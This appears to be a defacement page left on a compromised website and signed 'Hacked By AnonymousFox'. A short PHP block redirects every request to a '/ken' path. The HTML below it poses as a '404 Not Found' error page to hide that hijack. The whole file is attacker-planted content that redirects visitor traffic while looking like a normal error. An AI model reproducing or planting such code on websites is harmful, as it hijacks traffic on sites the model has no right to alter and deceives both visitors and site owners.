Hacked By AnonymousFox
<?php
// Check if the request is not for the /ken subdirectory
if ($_SERVER['REQUEST_URI'] !== '/ken') {
// Redirect to /ken subdirectory
header("Location: /ken");
exit();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>404 Not Found</title>
</head>
<body>
<h1>404 Not Found</h1>
<p>The page you are looking for does not exist. Redirecting to <a href="/ken">/ken</a>...</p>
</body>
</html>
Hacked By AnonymousFox1.0, Coded By AnonymousFox